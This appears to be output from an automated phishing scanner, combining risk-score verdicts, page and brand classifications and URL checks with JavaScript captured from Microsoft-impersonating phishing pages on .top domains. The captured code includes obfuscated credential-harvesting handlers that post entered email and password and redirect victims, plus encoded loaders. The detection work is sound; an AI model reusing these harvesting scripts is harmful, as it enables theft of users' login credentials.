HRoZSBicm93c2VyIGZpZ3VyZXMgaXQgb3V0IHRvIGJlCiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLXdpdGgnLCAnWE1MSHR0cFJlcXVlc3QnKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlcignWC1SZXF1ZXN0ZWQtVGltZVN0YW1wJywgJycpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdYLVJlcXVlc3RlZC1UaW1lU3RhbXAtRXhwaXJlJywgJycpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdYLVJlcXVlc3RlZC1UaW1lU3RhbXAtQ29tYmluYXRpb24nLCAnJyk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVR5cGUnLCAnR0VUJyk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVR5cGUtQ29tYmluYXRpb24nLCAnR0VUJyk7IC8vRW5jcnlwdGVkIGZvciB0b2RheXMgZGF0ZQogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC53aXRoQ3JlZGVudGlhbHMgPSB0cnVlOwp2YXIgc3csIHNoLCB3dywgd2gsIHY7CnN3ID0gc2NyZWVuLndpZHRoOwpzaCA9IHNjcmVlbi5oZWlnaHQ7Cnd3ID0gd2luZG93LmlubmVyV2lkdGggfHwgZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmNsaWVudFdpZHRoIHx8IGRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGggfHwgMDsKd2ggPSB3aW5kb3cuaW5uZXJIZWlnaHQgfHwgZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmNsaWVudEhlaWdodCB8fCBkb2N1bWVudC5ib2R5LmNsaWVudEhlaWdodCB8fCAwOwppZiAoKHN3ID09IHd3KSAmJiAoc2ggPT0gd2gpKSB7CiAgICB2ID0gdHJ1ZTsKICAgIGlmICghKHd3ICUgMjAwKSAmJiAod2ggJSAxMDApKSB7CiAgICAgICAgdiA9IHRydWU7CiAgICB9Cn0KLy92ID0gdHJ1ZTsgLy90ZXN0IHZhciBudWxsZWQgb3V0IHVzZWQgZm9yIGRlYnVnZ2luZyBwdXJwb3NlCmlmICh2ID09IHRydWUpIHsKICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCcwT3dkTHptQkNmMmlOTXVSckQwTm4yRnlUbWcnLCAnMzNKMkw2LUNpVEZ6VWc2dGh2YmRMcTQ4NXA4Jyk7Cn0KICAgICAgICAgI";var _5413_23="CAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC10eXBlIiwgImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZW5kKCJuYW1lMT1IZW5yeSZuYW1lMj1Gb3JkIik7CiAgICAgICAgfSwgZmFsc2UpOwp9KSgpOwo=";var _3_38827="KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciB0aW1lID0gbm93LmdldFRpbWUoKTsKICAgICAgICAgICAgICAgICAgICAgICAgdGltZSArPSAzMDAgKiAxMDAwOwogICAgICAgICAgICAgICAgICAgICAgICBub3cuc2V0VGltZSh0aW1lKTsKICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuY29va2llID0gJ2hTb0hqdmIwa0ozWUNmS2JDa3hmM0hzY0Vjcz0yNFY1ZmRfU3FHZnluQ3NIbUFKYmw5eVNuZEEnICsgJzsgZXhwaXJlcz0nICsgJ1RodSwgMDktSmFuLTI1IDIxOjM0OjAxIEdNVCcgKyAnOyBwYXRoPS8nOwogICAgICAgICAgICAgICAgICAgICAgICAvL2phdmFzY3JpcHQgcHV6emxlIGZvciBicm93c2VyIHRvIGZpZ3VyZSBvdXQgdG8gZ2V0IGFuc3dlcgogICAgICAg

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the code, suggests this is a highly suspicious and potentially malicious script."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8fef4f2bea0cc44f',t:'MTczNjM3MjA0MS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Verify you are human",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
    "risk_score": 7,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It appears to be collecting user email and password information and sending it to an external domain, which is a strong indicator of malicious intent. The script also attempts to redirect the user to a suspicious domain, further increasing the risk. While some contextual factors, such as the use of a legitimate-looking domain, may suggest a potential legitimate purpose, the overall behavior of the script is highly suspicious and warrants further investigation."
}

                var _0x4b2ae7=_0x11b0;function _0x11b0(_0xb93bd6,_0x334a28){var _0x565661=_0x5656();return _0x11b0=function(_0x11b02e,_0x1cb60d){_0x11b02e=_0x11b02e-0x99;var _0x2026f8=_0x565661[_0x11b02e];return _0x2026f8;},_0x11b0(_0xb93bd6,_0x334a28);}(function(_0x139ef9,_0x5ec660){var _0x59bd69=_0x11b0,_0x2b75ae=_0x139ef9();while(!![]){try{var _0x13e7a5=parseInt(_0x59bd69(0xa0))/0x1+parseInt(_0x59bd69(0xb0))/0x2*(parseInt(_0x59bd69(0x9d))/0x3)+-parseInt(_0x59bd69(0xb6))/0x4*(-parseInt(_0x59bd69(0xb4))/0x5)+-parseInt(_0x59bd69(0xac))/0x6+-parseInt(_0x59bd69(0xa6))/0x7+-parseInt(_0x59bd69(0xad))/0x8+-parseInt(_0x59bd69(0xa5))/0x9*(-parseInt(_0x59bd69(0xb1))/0xa);if(_0x13e7a5===_0x5ec660)break;else _0x2b75ae['push'](_0x2b75ae['shift']());}catch(_0x4d056b){_0x2b75ae['push'](_0x2b75ae['shift']());}}}(_0x5656,0x5b144),document['querySelector'](_0x4b2ae7(0x9f))['addEventListener'](_0x4b2ae7(0xa4),_0x873545=>{var _0x420903=_0x4b2ae7;_0x873545['preventDefault'](),document[_0x420903(0xb8)](_0x420903(0xb7))['hidden']?(document['querySelector'](_0x420903(0xaa))[_0x420903(0xa9)][_0x420903(0xa1)](_0x420903(0xa3)),fetch('',{'method':_0x420903(0xa7),'body':JSON[_0x420903(0xb9)]({'email':document[_0x420903(0xb8)](_0x420903(0xb2))[_0x420903(0x9e)]}),'headers':{'content-type':_0x420903(0x9a)}})['then'](_0x21e2bb=>{var _0x5950a5=_0x420903;return _0x21e2bb[_0x5950a5(0xa2)]();})[_0x420903(0xab)](_0x48fe24=>{var _0x268e64=_0x420903;console[_0x268e64(0xae)](_0x48fe24),_0x48fe24['redirection']?location['href']=_0x48fe24[_0x268e64(0x9b)]:(document[_0x268e64(0xb8)]('#password')[_0x268e64(0xa8)]=![],document[_0x268e64(0xb8)]('#password')[_0x268e64(0x9c)]=!![],document[_0x268e64(0xb8)](_0x268e64(0xaa))[_0x268e64(0xa9)][_0x268e64(0xb3)]('disabled'));})[_0x420903(0xaf)](_0x25a73e=>{var _0x9b98d7=_0x420903;console[_0x9b98d7(0xae)](_0x25a73e);})):(document[_0x420903(0xb8)]('.form-submit')[_0x420903(0xa9)][_0x420903(0xa1)](_0x420903(0xa3)),fetch('',{'method':_0x420903(0xa7),'body':JSON[_0x420903(0xb9)]({'email':document[_0x420903(0xb8)](_0x420903(0xb2))[_0x420903(0x9e)],'password':document[_0x420903(0xb8)](_0x420903(0xb7))[_0x420903(0x9e)],'send':!![]}),'headers':{'content-type':_0x420903(0x9a)}})[_0x420903(0xab)](_0x39613c=>{return _0x39613c['json']();})['then'](_0x349617=>{var _0x59af61=_0x420903;_0x349617['redirection']?location[_0x59af61(0x99)](_0x349617[_0x59af61(0x9b)]):location[_0x59af61(0x99)](_0x59af61(0xb5));})['catch'](_0x552b62=>{var _0x57df9e=_0x420903;console[_0x57df9e(0xae)](_0x552b62);}));}));function _0x5656(){var _0x44dcc6=['add','json','disabled','submit','477wKaVlT','1637965uuFihq','POST','hidden','classList','.form-submit','then','2505888SuUBES','4178312LHHDfl','log','catch','2iBzkGU','115820arlNhi','#email','remove','10BDxYpu','https://britishcouncil-my.sharepoint.com/:x:/g/personal/mohammadnavid_rahmat_britishcouncil_org/EaaPuY63N_pNpyRttYsa2yYBiPQKbv9J7vzO0gIMkIMtrw?e=CmakPC','1764wWvWWg','#password','querySelector','stringify','replace','application/json','redirection','required','1365351fvvrKN','value','#emailIdentificationForm','477147CZYpwS'];_0x5656=function(){return _0x44dcc6;};return _0x5656();}
        

{
"contains_trigger_text": true,
"trigger_text": "Shared file",
"prominent_button_name": "Next",
"text_input_field_labels": ["Enter email"],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft",
    "OneDrive"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is a well-known global technology company.",    "The legitimate domain for Microsoft is 'microsoft.com'.",    "The provided URL 'jackoffjackofflilliilkillxoopoeadonline.top' does not match the legitimate domain for Microsoft.",    "The URL contains suspicious elements such as random words and an unusual domain extension '.top'.",    "The URL does not have any recognizable association with Microsoft.",    "The presence of an input field asking for an email is common in phishing attempts to harvest credentials."  ],  "riskscore": 9}
Google indexed: False

{
    "risk_score": 7,
    "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have a legitimate purpose, the overall behavior is highly suspicious and requires further investigation."
}

            function dignissimvenenatis(e){
                const _0x51110d=_0x133c;(function(_0x1745e6,_0x5f0844){const _0xe67aa7=_0x133c,_0x32b1c1=_0x1745e6();while(!![]){try{const _0x40ed81=parseInt(_0xe67aa7(0x1a1))/0x1*(-parseInt(_0xe67aa7(0x1c6))/0x2)+parseInt(_0xe67aa7(0x1bf))/0x3+parseInt(_0xe67aa7(0x1af))/0x4+-parseInt(_0xe67aa7(0x1bc))/0x5*(parseInt(_0xe67aa7(0x19d))/0x6)+-parseInt(_0xe67aa7(0x1c4))/0x7+-parseInt(_0xe67aa7(0x1aa))/0x8+parseInt(_0xe67aa7(0x1bb))/0x9*(parseInt(_0xe67aa7(0x1a2))/0xa);if(_0x40ed81===_0x5f0844)break;else _0x32b1c1['push'](_0x32b1c1['shift']());}catch(_0x1266a1){_0x32b1c1['push'](_0x32b1c1['shift']());}}}(_0x2979,0x956aa));function _0x2979(){const _0x3eed36=['cf-turnstile-response','success','mail','GET','json','VoidProxY','forEach','location','keys','?authvp=','join','3379473NUUBqm','44290KROdvd','append','map','3569907DtyEWh','asc','from','POST','username','4822930ZgYsAS','random','114KjtkUt','24QaqtHs','searchParams','slice','origin','16175joZtKl','10MafuFn','set','subtle','login_hint','encode','text','split','toString','2142336QhhttV','padStart','search','get','lht','3842932pPIeqp'];_0x2979=function(){return _0x3eed36;};return _0x2979();}function _0x133c(_0x15ede3,_0x2eb28b){const _0x2979c0=_0x2979();return _0x133c=function(_0x133c2a,_0x1231e1){_0x133c2a=_0x133c2a-0x19d;let _0x32bf30=_0x2979c0[_0x133c2a];return _0x32bf30;},_0x133c(_0x15ede3,_0x2eb28b);}async function sha256(_0x477692){const _0x54ce63=_0x133c,_0x2ef791=new TextEncoder()[_0x54ce63(0x1a6)](_0x477692),_0x46aaf8=await crypto[_0x54ce63(0x1a4)]['digest']('SHA-256',_0x2ef791),_0x24ffa9=Array['from'](new Uint8Array(_0x46aaf8)),_0x50edfa=_0x24ffa9[_0x54ce63(0x1be)](_0x1834b8=>_0x1834b8['toString'](0x10)[_0x54ce63(0x1ab)](0x2,'0'))['join']('');return _0x50edfa;}let formData=new FormData();formData[_0x51110d(0x1bd)](_0x51110d(0x1b0),e),fetch('/',{'method':_0x51110d(0x1c2),'body':formData})['then'](_0x4ce301=>_0x4ce301[_0x51110d(0x1b4)]())['then'](async _0x311349=>{const _0x5499b6=_0x51110d;if(_0x311349[_0x5499b6(0x1b1)]){let _0x44f870=new URL(atob(location[_0x5499b6(0x1ac)][_0x5499b6(0x1a8)]('=')[_0x5499b6(0x19f)](0x1)[_0x5499b6(0x1ba)]('='))),_0x263902=Math['floor'](Math[_0x5499b6(0x1c5)]()*0xf4240)[_0x5499b6(0x1a9)](),_0xc4ba9e=await sha256(_0x5499b6(0x1b5)+_0x263902),_0x9c833a=await fetch(_0x44f870[_0x5499b6(0x1a0)]+_0x5499b6(0x1b9)+_0x263902+'-'+_0xc4ba9e,{'method':_0x5499b6(0x1b3)}),_0x4facb4=await _0x9c833a[_0x5499b6(0x1a7)]();_0x44f870['pathname']=atob(_0x4facb4['split']('')['reverse']()['join']('')['replaceAll']('$','='));let _0x3a25d2=['omn','xkz',_0x5499b6(0x1c0),_0x5499b6(0x1ae),_0x5499b6(0x1b2)],_0x244192=null;for(var _0x112dc0 of _0x3a25d2){if(_0x44f870[_0x5499b6(0x19e)][_0x5499b6(0x1ad)](_0x112dc0)){_0x244192=_0x44f870[_0x5499b6(0x19e)][_0x5499b6(0x1ad)](_0x112dc0);try{_0x244192=atob(_0x244192);}catch{}break;}}Array[_0x5499b6(0x1c1)](_0x44f870[_0x5499b6(0x19e)][_0x5499b6(0x1b8)]())[_0x5499b6(0x1b6)](_0x2da316=>{const _0x2fe5bc=_0x5499b6;_0x44f870[_0x2fe5bc(0x19e)]['delete'](_0x2da316);}),_0x244192&&(_0x44f870['searchParams']['set'](_0x5499b6(0x1a5),_0x244192),_0x44f870[_0x5499b6(0x19e)][_0x5499b6(0x1a3)](_0x5499b6(0x1c3),_0x244192)),top[_0x5499b6(0x1b7)]['href']=_0x44f870[_0x5499b6(0x1a9)]();}});
            }
		

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script sets up various configuration options and event handlers to handle communication between the challenge widget and the parent window. While it uses some legacy APIs like `postMessage()`, the overall behavior is consistent with a legitimate security mechanism and does not exhibit any high-risk indicators. The script is likely benign and part of a standard web security implementation."
}

        (function(){
            window._cf_chl_opt={
                cvId: '3',
                cZone: 'challenges.cloudflare.com',
                cTplV: 5,
                chlApivId: '0',
                chlApiWidgetId: 'lx2gx',
                chlApiSitekey: '0x4AAAAAAAi078AM9w38G8rk',
                chlApiMode: 'managed',
                chlApiSize: 'normal',
                chlApiRcV: 'VNtZC8GntZwtxzd44alefsyCKPS3P2mMlPOmqUtQtAU-1736372081-1.3.1.1-lwQ4Eho.g2G5_zIlcs4IrMPmq1.4qCGVw6Ak94NEwYg',
                chlApiTimeoutEncountered: 0,
                chlApiOverrunBudgetMs:10000,
                chlTimeoutMs:120000,
                cK:[],
                cType: 'chl_api_m',
                cRay: '8fef502579544204',
                cH: 'nCjU7hjfRJhU0JxY41M3fiVXpgFwJyXo4VAYZVm2vzM-1736372081-1.1.1.1-Eava_9dulVNDchyZ6LYp71PpJumZaCJ_XFMbV7EW.B1usefnhu82GBfWAXhgZLOc',
                cFPWv: 'g',
                cLt: 'n',
                chlApiFailureFeedbackEnabled:true,
                chlApiLoopFeedbackEnabled:false,
                wOL:false,
                wT: 'auto',
                wS: 'normal',
                md: 'eiP59kk_Gsc4Vrug9w0F_aNDmT7wxVmUfexFS0Nv2Gs-1736372081-1.1.1.1-7N.Wz_BKCV9AFl_BbNhC3ttAqc4ArXptE5Dsoz45N6A4KQe1WVFscpl5lsWuPD74nXhI0g48Fr2v1xrhJvbOw6vgpFmw1btzah0gQONlB896T2dg5LuOBzszFKlnpLFtAelj81MQpCqbdwvjhU80I888RjDAbvOvmAJOfnSyPOnF1ikWPBaZZgEt_pS2JXcVSQMc4FMKOsFGz0xPR18zKynmoWLphdikh13b2qfluz40otIij3U.afvOVoRkHMtgWqoXyXZFL.l9MhwErymSNDnUi4Zvl3FnqOan9kxgXAiS6GAkAfOlr.4AarNdQDcW2IDepR2S6H_t1t3kdBdtexoEqFErmRmAYcgIwX_cjNkz5Bl7M1EPURbW7hDY_m2Fjh11Ycx3XR_aXxyJNi6pO1nOSg169ncxg_bGx0NqcISsTzB0i57qejNaOoLnKiU1ANieJfLDezaYW9cq61cuvdZ34_0MGF3peUXFGxGRZ7r3jRJiEdrrz1HiQYdGDAqHXKnV_DCC5Q3mzRzvsjVch82DmPiAcwY__7EiHEW0Py5uH0dZWLGuB9eorFqA2r8ApcVoc5rZyrxIYJvaPm0dZbjoXosF9pvsiO1H3TBmqCkFKxTHpPSoPHx6E.biW20tMhkWjpAf84GFtQvaASzr89a.a5tCapM8UmGHYDuBjdRnaOgs4_caDZHNuoeiIC9sF2HDXFUoY2HZbSV3yZAFKM2cLbr0F165DjbteD4A08UJXt9oAtZSWIsnr0RDnedJ208j53UprT1xvkJshbbbtSZLPXeoJN4MGCAlSIkcVyxlnt.0YKHELuIcoo4j8pEWNFvSqv9GvRGjrXWDAmpBZnLq9I4LsVLsUJbfv5mDF1FBst5ynwgzwgyOLzXj70L32mydE3GmxoIHHS0Aid9GbAjqELM1PrCEUWzpUoeIwlktq.R7p_PaVVtMionesYl_Jz5Z8elu4WO9y7JDbF7fyZDt_.dkPGs8eIEbo6mrQ3SrUZXy3f0B_RCLXsmHaLAYTCPd9eBnDLaPssAC.5fXLsvRFNG55shkWYY22ewdiHnW2EUR9dJvUMd565NRoUQcUd3ze.TGiqKkY7NUbs6Iy4lvh3fYafms9WM8scOtRztETwc9oC4IT4.QiDNd.ZZybKHAWmNcSws2iQ7qlW2uj1.RBCQnA1qExtE0yBKCVNJM_oBsk8VLgIID9m0WSPmEqCED9b5vKc88Acm5FX6JI6S9pjcynIIX6o7qpbEuP91elMrRaM_20ykBEfjYAE39CV.4mD0MBpiH9LdVAX3cjaSdlJ6x_zF2KQvuz5Zo7Ndlg_tvKgQSwPM1cemdDX_5lPLh9tyN4MZtM7qNS9h43NxrcNjrdvqL5g1wwejPcD0',
                cITimeS: '1736372081',
                refresh: function(){
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: 'lx2gx',
                            nextRcV: 'VNtZC8GntZwtxzd44alefsyCKPS3P2mMlPOmqUtQtAU-1736372081-1.3.1.1-lwQ4Eho.g2G5_zIlcs4IrMPmq1.4qCGVw6Ak94NEwYg',
                            event: 'reloadRequest',
                        }, "*");
                    }
                }
            };
            var handler = function(event) {
                var e = event.data;
                if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: window._cf_chl_opt.chlApiWidgetId,
                            event: 'food',
                            seq: e.seq,
                        }, '*');
                    }
                }
            }
            window.addEventListener('message', handler);
        }());
    

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": true,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://login.pguhmxcggroup.top

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Cloudflare"
  ]
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Cloudflare"
  ]
}

{
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"mstest@domain.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "contains_trigger_text": true,
  "trigger_text": "Sign in",
  "prominent_button_name": "Next",
  "text_input_field_labels": [
    "mstest@domain.com"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "contains_trigger_text": true,
  "trigger_text": "This username may be incorrect. Make sure you typed it correctly. Otherwise, contact your admin.",
  "prominent_button_name": "Next",
  "text_input_field_labels": [
    "mstest@domain.com"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft"
  ]
}

{
  "brands": [
    "Microsoft"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is a well-known global technology company.",    "The legitimate domain for Microsoft is 'microsoft.com'.",    "The provided URL 'login.pguhmxcggroup.top' does not match the legitimate domain.",    "The URL contains unusual elements such as 'pguhmxcggroup' and uses a '.top' domain extension, which is uncommon for Microsoft.",    "The presence of 'login' in the subdomain is a common tactic used in phishing to mimic login pages."  ],  "riskscore": 9}
Google indexed: False

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is a well-known global technology company.",    "The legitimate domain for Microsoft is 'microsoft.com'.",    "The provided URL 'login.pguhmxcggroup.top' does not match the legitimate domain.",    "The URL contains unusual elements such as 'pguhmxcggroup' which do not relate to Microsoft.",    "The domain extension '.top' is uncommon for a well-known brand like Microsoft.",    "The presence of 'login' in the subdomain is a common tactic used in phishing to mimic login pages."  ],  "riskscore": 9}
Google indexed: False